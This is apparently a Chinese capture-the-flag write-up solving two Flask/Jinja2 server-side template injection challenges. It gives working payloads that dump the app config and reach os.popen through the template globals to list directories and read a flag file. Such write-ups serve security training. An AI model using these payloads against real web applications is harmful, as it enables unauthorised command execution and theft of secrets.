Simple_SSTI_1

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Simple SSTI</title>
</head>
<body>
You need pass in a parameter named flag。
<!-- You know, in the flask, We often set a secret_key variable.-->
</body>
</html>

提示说通常设置一个secret_key变量
所以我们想要读出secret_key,可以导出所有的config变量

/?flag={{config.items()}}

Simple_SSTI_2


传点错误语句看看是什么模板

ls查看一下存在的文件

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

查看网页返回结果,发现存在一些文件夹

进入查看

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

发现第一个看的app文件夹里就有flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}